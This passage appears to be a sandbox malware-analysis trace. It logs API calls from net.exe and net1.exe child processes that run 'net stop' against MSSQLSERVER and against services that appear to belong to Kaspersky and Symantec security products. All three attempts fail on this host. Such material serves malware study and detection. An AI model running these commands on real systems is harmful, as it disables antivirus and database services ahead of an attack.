_String2="stop") returned -12 [0044.115] _wcsicmp (_String1="help", _String2="stop") returned -11 [0044.115] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0044.115] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0044.115] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0044.115] _wcsicmp (_String1="session", _String2="stop") returned -15 [0044.115] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0044.115] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0044.115] _wcsicmp (_String1="share", _String2="stop") returned -12 [0044.115] _wcsicmp (_String1="start", _String2="stop") returned -14 [0044.115] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0044.115] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0044.115] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0044.115] _wcsicmp (_String1="accounts", _String2="MSSQLSERVER") returned -12 [0044.115] _wcsicmp (_String1="computer", _String2="MSSQLSERVER") returned -10 [0044.115] _wcsicmp (_String1="config", _String2="MSSQLSERVER") returned -10 [0044.116] _wcsicmp (_String1="continue", _String2="MSSQLSERVER") returned -10 [0044.116] _wcsicmp (_String1="cont", _String2="MSSQLSERVER") returned -10 [0044.116] _wcsicmp (_String1="file", _String2="MSSQLSERVER") returned -7 [0044.116] _wcsicmp (_String1="files", _String2="MSSQLSERVER") returned -7 [0044.116] _wcsicmp (_String1="group", _String2="MSSQLSERVER") returned -6 [0044.116] _wcsicmp (_String1="groups", _String2="MSSQLSERVER") returned -6 [0044.116] _wcsicmp (_String1="help", _String2="MSSQLSERVER") returned -5 [0044.116] _wcsicmp (_String1="helpmsg", _String2="MSSQLSERVER") returned -5 [0044.116] _wcsicmp (_String1="localgroup", _String2="MSSQLSERVER") returned -1 [0044.116] _wcsicmp (_String1="pause", _String2="MSSQLSERVER") returned 3 [0044.116] _wcsicmp (_String1="session", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="sessions", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="sess", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="share", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="start", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="stats", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="statistics", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="stop", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="time", _String2="MSSQLSERVER") returned 7 [0044.116] _wcsicmp (_String1="user", _String2="MSSQLSERVER") returned 8 [0044.116] _wcsicmp (_String1="users", _String2="MSSQLSERVER") returned 8 [0044.116] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0044.116] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0044.116] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0044.116] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0044.116] _wcsicmp (_String1="netpopup", _String2="MSSQLSERVER") returned 1 [0044.116] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0044.116] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0044.116] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0044.116] _wcsicmp (_String1="workstation", _String2="MSSQLSERVER") returned 10 [0044.116] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0044.116] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0044.116] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0044.116] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 [0044.116] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0044.116] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0044.116] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0044.117] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0044.117] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0044.117] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0044.117] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0044.117] _wcsupr (in: _String="MSSQLSERVER" | out: _String="MSSQLSERVER") returned="MSSQLSERVER" [0044.117] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6254d0 [0044.120] GetServiceKeyNameW (in: hSCManager=0x6254d0, lpDisplayName="MSSQLSERVER", lpServiceName=0xf1aaf0, lpcchBuffer=0x11f894 | out: lpServiceName="", lpcchBuffer=0x11f894) returned 0 [0044.120] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0044.120] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0044.120] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0044.120] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0044.120] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0044.120] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0044.120] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0044.120] _wcsicmp (_String1="workstation", _String2="MSSQLSERVER") returned 10 [0044.120] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0044.120] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0044.120] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0044.120] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 [0044.120] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0044.120] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0044.121] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0044.121] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0044.121] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0044.121] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0044.121] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0044.121] NetServiceControl (in: servername=0x0, service="MSSQLSERVER", opcode=0x0, arg=0x0, bufptr=0x11f890 | out: bufptr=0x11f890) returned 0x889 [0044.121] wcscpy_s (in: _Destination=0xf1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0044.121] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0044.122] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xf1b338, nSize=0x800, Arguments=0xf19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0044.123] GetFileType (hFile=0x26c) returned 0x3 [0044.123] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x624000 [0044.123] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x624000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0044.123] WriteFile (in: hFile=0x26c, lpBuffer=0x624000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x11f7d0, lpOverlapped=0x0 | out: lpBuffer=0x624000*, lpNumberOfBytesWritten=0x11f7d0*=0x1e, lpOverlapped=0x0) returned 1 [0044.123] LocalFree (hMem=0x624000) returned 0x0 [0044.123] GetFileType (hFile=0x26c) returned 0x3 [0044.123] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6262a8 [0044.123] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0044.123] WriteFile (in: hFile=0x26c, lpBuffer=0x6262a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x11f7d0, lpOverlapped=0x0 | out: lpBuffer=0x6262a8*, lpNumberOfBytesWritten=0x11f7d0*=0x2, lpOverlapped=0x0) returned 1 [0044.124] LocalFree (hMem=0x6262a8) returned 0x0 [0044.124] _ultow (in: _Dest=0x889, _Radix=1177600 | out: _Dest=0x889) returned="2185" [0044.124] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf1b338, nSize=0x800, Arguments=0xf19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0044.124] GetFileType (hFile=0x26c) returned 0x3 [0044.124] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6262a8 [0044.124] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6262a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0044.124] WriteFile (in: hFile=0x26c, lpBuffer=0x6262a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x11f7dc, lpOverlapped=0x0 | out: lpBuffer=0x6262a8*, lpNumberOfBytesWritten=0x11f7dc*=0x34, lpOverlapped=0x0) returned 1 [0044.124] LocalFree (hMem=0x6262a8) returned 0x0 [0044.124] GetFileType (hFile=0x26c) returned 0x3 [0044.124] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6262a8 [0044.124] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0044.124] WriteFile (in: hFile=0x26c, lpBuffer=0x6262a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x11f7dc, lpOverlapped=0x0 | out: lpBuffer=0x6262a8*, lpNumberOfBytesWritten=0x11f7dc*=0x2, lpOverlapped=0x0) returned 1 [0044.124] LocalFree (hMem=0x6262a8) returned 0x0 [0044.124] NetApiBufferFree (Buffer=0x621c70) returned 0x0 [0044.125] NetApiBufferFree (Buffer=0x621c88) returned 0x0 [0044.125] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLSERVER /y" [0044.125] exit (_Code=2) Process: id = "75" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47391000" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop KAVFS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 143 os_tid = 0x87c Process: id = "76" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4840f000" os_pid = "0x864" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0x878" cmd_line = "C:\\Windows\\system32\\net1 stop KAVFS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 144 os_tid = 0x8b4 [0044.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fe90 | out: lpSystemTimeAsFileTime=0x17fe90*(dwLowDateTime=0xe49de100, dwHighDateTime=0x1d57a86)) [0044.320] GetCurrentProcessId () returned 0x864 [0044.320] GetCurrentThreadId () returned 0x8b4 [0044.320] GetTickCount () returned 0x11460d6 [0044.320] QueryPerformanceCounter (in: lpPerformanceCount=0x17fe88 | out: lpPerformanceCount=0x17fe88*=16460425872) returned 1 [0044.320] GetModuleHandleA (lpModuleName=0x0) returned 0x6f0000 [0044.320] __set_app_type (_Type=0x1) [0044.320] __p__fmode () returned 0x74eb31f4 [0044.320] __p__commode () returned 0x74eb31fc [0044.320] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x6fffe6) returned 0x0 [0044.320] __getmainargs (in: _Argc=0x709064, _Argv=0x70906c, _Env=0x709068, _DoWildCard=0, _StartInfo=0x709024 | out: _Argc=0x709064, _Argv=0x70906c, _Env=0x709068) returned 0 [0044.320] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.320] GetConsoleOutputCP () returned 0x1b5 [0044.322] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x709080 | out: lpCPInfo=0x709080) returned 1 [0044.322] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.325] sprintf_s (in: _DstBuf=0x17fe48, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0044.326] setlocale (category=0, locale=".437") returned="English_United States.437" [0044.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0044.327] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0044.328] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFS /y" [0044.328] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17fc14, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0044.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2d3bf0 [0044.328] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0044.328] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fe18 | out: Buffer=0x17fe18*=0x2d1c50) returned 0x0 [0044.328] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fe18 | out: Buffer=0x17fe18*=0x2d1c68) returned 0x0 [0044.328] _fileno (_File=0x74eb2900) returned -2 [0044.328] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0044.328] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0044.328] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0044.328] _wcsicmp (_String1="config", _String2="stop") returned -16 [0044.328] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0044.328] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0044.328] _wcsicmp (_String1="file", _String2="stop") returned -13 [0044.328] _wcsicmp (_String1="files", _String2="stop") returned -13 [0044.328] _wcsicmp (_String1="group", _String2="stop") returned -12 [0044.328] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0044.328] _wcsicmp (_String1="help", _String2="stop") returned -11 [0044.328] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0044.328] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0044.328] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0044.328] _wcsicmp (_String1="session", _String2="stop") returned -15 [0044.328] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0044.329] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0044.329] _wcsicmp (_String1="share", _String2="stop") returned -12 [0044.329] _wcsicmp (_String1="start", _String2="stop") returned -14 [0044.329] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0044.329] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0044.329] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0044.329] _wcsicmp (_String1="accounts", _String2="KAVFS") returned -10 [0044.329] _wcsicmp (_String1="computer", _String2="KAVFS") returned -8 [0044.329] _wcsicmp (_String1="config", _String2="KAVFS") returned -8 [0044.329] _wcsicmp (_String1="continue", _String2="KAVFS") returned -8 [0044.329] _wcsicmp (_String1="cont", _String2="KAVFS") returned -8 [0044.329] _wcsicmp (_String1="file", _String2="KAVFS") returned -5 [0044.329] _wcsicmp (_String1="files", _String2="KAVFS") returned -5 [0044.329] _wcsicmp (_String1="group", _String2="KAVFS") returned -4 [0044.329] _wcsicmp (_String1="groups", _String2="KAVFS") returned -4 [0044.329] _wcsicmp (_String1="help", _String2="KAVFS") returned -3 [0044.329] _wcsicmp (_String1="helpmsg", _String2="KAVFS") returned -3 [0044.329] _wcsicmp (_String1="localgroup", _String2="KAVFS") returned 1 [0044.329] _wcsicmp (_String1="pause", _String2="KAVFS") returned 5 [0044.329] _wcsicmp (_String1="session", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="sessions", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="sess", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="share", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="start", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="stats", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="statistics", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="stop", _String2="KAVFS") returned 8 [0044.329] _wcsicmp (_String1="time", _String2="KAVFS") returned 9 [0044.329] _wcsicmp (_String1="user", _String2="KAVFS") returned 10 [0044.329] _wcsicmp (_String1="users", _String2="KAVFS") returned 10 [0044.329] _wcsicmp (_String1="msg", _String2="KAVFS") returned 2 [0044.329] _wcsicmp (_String1="messenger", _String2="KAVFS") returned 2 [0044.329] _wcsicmp (_String1="receiver", _String2="KAVFS") returned 7 [0044.329] _wcsicmp (_String1="rcv", _String2="KAVFS") returned 7 [0044.329] _wcsicmp (_String1="netpopup", _String2="KAVFS") returned 3 [0044.329] _wcsicmp (_String1="redirector", _String2="KAVFS") returned 7 [0044.329] _wcsicmp (_String1="redir", _String2="KAVFS") returned 7 [0044.329] _wcsicmp (_String1="rdr", _String2="KAVFS") returned 7 [0044.330] _wcsicmp (_String1="workstation", _String2="KAVFS") returned 12 [0044.330] _wcsicmp (_String1="work", _String2="KAVFS") returned 12 [0044.330] _wcsicmp (_String1="wksta", _String2="KAVFS") returned 12 [0044.330] _wcsicmp (_String1="prdr", _String2="KAVFS") returned 5 [0044.330] _wcsicmp (_String1="devrdr", _String2="KAVFS") returned -7 [0044.330] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFS") returned 1 [0044.330] _wcsicmp (_String1="server", _String2="KAVFS") returned 8 [0044.330] _wcsicmp (_String1="svr", _String2="KAVFS") returned 8 [0044.330] _wcsicmp (_String1="srv", _String2="KAVFS") returned 8 [0044.330] _wcsicmp (_String1="lanmanserver", _String2="KAVFS") returned 1 [0044.330] _wcsicmp (_String1="alerter", _String2="KAVFS") returned -10 [0044.330] _wcsicmp (_String1="netlogon", _String2="KAVFS") returned 3 [0044.330] _wcsupr (in: _String="KAVFS" | out: _String="KAVFS") returned="KAVFS" [0044.330] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2d54a0 [0044.333] GetServiceKeyNameW (in: hSCManager=0x2d54a0, lpDisplayName="KAVFS", lpServiceName=0x70aaf0, lpcchBuffer=0x17fdb4 | out: lpServiceName="", lpcchBuffer=0x17fdb4) returned 0 [0044.333] _wcsicmp (_String1="msg", _String2="KAVFS") returned 2 [0044.333] _wcsicmp (_String1="messenger", _String2="KAVFS") returned 2 [0044.333] _wcsicmp (_String1="receiver", _String2="KAVFS") returned 7 [0044.333] _wcsicmp (_String1="rcv", _String2="KAVFS") returned 7 [0044.333] _wcsicmp (_String1="redirector", _String2="KAVFS") returned 7 [0044.333] _wcsicmp (_String1="redir", _String2="KAVFS") returned 7 [0044.333] _wcsicmp (_String1="rdr", _String2="KAVFS") returned 7 [0044.333] _wcsicmp (_String1="workstation", _String2="KAVFS") returned 12 [0044.334] _wcsicmp (_String1="work", _String2="KAVFS") returned 12 [0044.334] _wcsicmp (_String1="wksta", _String2="KAVFS") returned 12 [0044.334] _wcsicmp (_String1="prdr", _String2="KAVFS") returned 5 [0044.334] _wcsicmp (_String1="devrdr", _String2="KAVFS") returned -7 [0044.334] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFS") returned 1 [0044.334] _wcsicmp (_String1="server", _String2="KAVFS") returned 8 [0044.334] _wcsicmp (_String1="svr", _String2="KAVFS") returned 8 [0044.334] _wcsicmp (_String1="srv", _String2="KAVFS") returned 8 [0044.334] _wcsicmp (_String1="lanmanserver", _String2="KAVFS") returned 1 [0044.334] _wcsicmp (_String1="alerter", _String2="KAVFS") returned -10 [0044.334] _wcsicmp (_String1="netlogon", _String2="KAVFS") returned 3 [0044.334] NetServiceControl (in: servername=0x0, service="KAVFS", opcode=0x0, arg=0x0, bufptr=0x17fdb0 | out: bufptr=0x17fdb0) returned 0x889 [0044.335] wcscpy_s (in: _Destination=0x70a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0044.335] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0044.335] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x70b338, nSize=0x800, Arguments=0x709dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0044.336] GetFileType (hFile=0x26c) returned 0x3 [0044.336] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2d3fd0 [0044.336] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2d3fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0044.336] WriteFile (in: hFile=0x26c, lpBuffer=0x2d3fd0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x17fcf0, lpOverlapped=0x0 | out: lpBuffer=0x2d3fd0*, lpNumberOfBytesWritten=0x17fcf0*=0x1e, lpOverlapped=0x0) returned 1 [0044.336] LocalFree (hMem=0x2d3fd0) returned 0x0 [0044.336] GetFileType (hFile=0x26c) returned 0x3 [0044.336] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6278 [0044.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0044.337] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6278*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fcf0, lpOverlapped=0x0 | out: lpBuffer=0x2d6278*, lpNumberOfBytesWritten=0x17fcf0*=0x2, lpOverlapped=0x0) returned 1 [0044.337] LocalFree (hMem=0x2d6278) returned 0x0 [0044.337] _ultow (in: _Dest=0x889, _Radix=1572128 | out: _Dest=0x889) returned="2185" [0044.337] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x70b338, nSize=0x800, Arguments=0x709dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0044.337] GetFileType (hFile=0x26c) returned 0x3 [0044.337] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2d6278 [0044.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2d6278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0044.337] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6278*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x17fcfc, lpOverlapped=0x0 | out: lpBuffer=0x2d6278*, lpNumberOfBytesWritten=0x17fcfc*=0x34, lpOverlapped=0x0) returned 1 [0044.337] LocalFree (hMem=0x2d6278) returned 0x0 [0044.337] GetFileType (hFile=0x26c) returned 0x3 [0044.337] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6278 [0044.337] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0044.337] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6278*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fcfc, lpOverlapped=0x0 | out: lpBuffer=0x2d6278*, lpNumberOfBytesWritten=0x17fcfc*=0x2, lpOverlapped=0x0) returned 1 [0044.337] LocalFree (hMem=0x2d6278) returned 0x0 [0044.337] NetApiBufferFree (Buffer=0x2d1c50) returned 0x0 [0044.338] NetApiBufferFree (Buffer=0x2d1c68) returned 0x0 [0044.338] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFS /y" [0044.338] exit (_Code=2) Process: id = "77" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47496000" os_pid = "0x8b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop Smcinst /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 145 os_tid = 0x858 Process: id = "78" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x45dc1000" os_pid = "0x844" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "77" os_parent_pid = "0x8b8" cmd_line = "C:\\Windows\\system32\\net1 stop Smcinst /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 146 os_tid = 0x860 [0044.624] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffcc8 | out: lpSystemTimeAsFileTime=0x2ffcc8*(dwLowDateTime=0xe4cd7c80, dwHighDateTime=0x1d57a86)) [0044.625] GetCurrentProcessId () returned 0x844 [0044.625] GetCurrentThreadId () returned 0x860 [0044.625] GetTickCount () returned 0x114620e [0044.625] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffcc0 | out: lpPerformanceCount=0x2ffcc0*=16490928632) returned 1 [0044.625] GetModuleHandleA (lpModuleName=0x0) returned 0x3d0000 [0044.625] __set_app_type (_Type=0x1) [0044.625] __p__fmode () returned 0x74eb31f4 [0044.625] __p__commode () returned 0x74eb31fc [0044.625] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3dffe6) returned 0x0 [0044.625] __getmainargs (in: _Argc=0x3e9064, _Argv=0x3e906c, _Env=0x3e9068, _DoWildCard=0, _StartInfo=0x3e9024 | out: _Argc=0x3e9064, _Argv=0x3e906c, _Env=0x3e9068) returned 0 [0044.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 